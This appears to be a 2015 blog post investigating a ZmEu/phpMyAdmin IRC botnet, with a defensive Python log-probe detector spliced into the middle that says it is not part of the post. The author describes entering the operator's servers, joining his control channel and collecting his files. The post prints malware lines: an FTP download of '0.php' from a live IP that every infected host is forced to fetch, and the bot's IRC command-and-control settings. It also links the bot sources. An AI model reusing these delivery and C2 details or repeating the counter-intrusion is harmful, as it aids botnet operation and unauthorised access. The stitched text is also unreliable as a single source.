
Wednesday, January 14, 2015

22k ZmEu Botnet

On my honeypot I found this connection; an IRC server was running on that server.

Connecting to that port ...


- Let's check the security of his server!! oh

Also many connections on that port, on which the IRC server is running.


Got his config, let's join the IRC ..


Many bots! 26k


/list

2 admin IP addresses

Now I checked some logs of the infected PCs and found this ...

Also, he is spreading via a script that searches for MySQL/PHP panels with weak or no password
and infects them too (/panel/script/setup.php); this is a tool which HF skids use,
it's called the ZmEu masscan, more on that later.
Also, 14.35.234.212 was his scanning / spreading server;
let's see if that one is better secured ... lolz

You see, it's a Perl script that attacks filtered IP addresses that have a
phpMyAdmin panel online or vulnerable | ps aux

So I located his script in /bin/.php/.
I'll attach an archive with all his data later.
See, all *.txt files are vulnerable phpMyAdmin panels that can maybe be exploited.
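Since the spreading script works by probing many hosts for a phpMyAdmin setup script, the defender's side of this is spotting those probes in web server logs. Below is an added example, not code from the post or from the attacker's archive: a small Python detector that parses combined-format access log lines, flags requests for the scripts/setup.php paths discussed above (including the /panel/script/setup.php variant) or the ZmEu User-Agent, and groups hits per source address. The sample log lines are constructed, and the ZmEu User-Agent pattern is an assumption to verify against your own logs.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" log format: client, timestamp, request line, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Scanners try many directory names in front of the phpMyAdmin setup script,
# e.g. the /panel/script/setup.php variant mentioned in the post.
PROBE_PATH_RE = re.compile(r'/scripts?/setup\.php$', re.IGNORECASE)
# The ZmEu scanner announces itself in the User-Agent header (pattern assumed here).
SCANNER_UA_RE = re.compile(r'zmeu', re.IGNORECASE)

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format log line into named fields, or None if malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry: Dict[str, str]) -> Optional[str]:
    """Return why the request looks like a phpMyAdmin probe, or None if it looks benign."""
    if SCANNER_UA_RE.search(entry["ua"]):
        return "scanner user-agent"
    if PROBE_PATH_RE.search(entry["path"]):
        return "setup.php probe"
    return None

def flag_probes(lines: List[str], threshold: int = 2) -> Dict[str, List[str]]:
    """Return {source_ip: [probed paths]} for sources with at least `threshold` suspicious hits."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None or classify(entry) is None:
            continue  # malformed line or ordinary traffic
        hits.setdefault(entry["ip"], []).append(entry["path"])
    return {ip: paths for ip, paths in hits.items() if len(paths) >= threshold}

# Constructed sample lines (not from the post's honeypot); addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Jan/2015:10:01:02 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 210 "-" "ZmEu"',
    '198.51.100.7 - - [14/Jan/2015:10:01:03 +0000] "GET /panel/script/setup.php HTTP/1.1" 404 210 "-" "ZmEu"',
    '203.0.113.5 - - [14/Jan/2015:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Jan/2015:10:05:01 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]
```

Running `flag_probes(SAMPLE_LOG)` reports only the first source, since a single setup.php request from an otherwise normal client stays below the threshold.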


cat all.pl 
http://pastebin.com/JZnMHGGE
I paste just this here:
my $url = $host;
my $ftp = "ftp://185.4.29.127/a/0.php";
my $len = length($ftp);
Every exploited PC is forced to download this file over FTP.
cat 0.php
http://pastebin.com/g75MAgjz
It's a PHP bot:
    "server" => "222.216.30.28",
    "port" => "3131",
    "key" => "*",
    "prefix" => "",
    "maxrand" => "8",
    "chan" => "#dd0s#",
    "trigger" => ".",
    "hostauth" => "root.edu"
There are some other files:
cat a.php 
http://pastebin.com/CKs5fRkv
cat ax.php
http://pastebin.com/GC3dcuyz
cat win.php
http://pastebin.com/3Np2JsYw

- All data will be attached soon as an archive ..
More about the pma bot here.
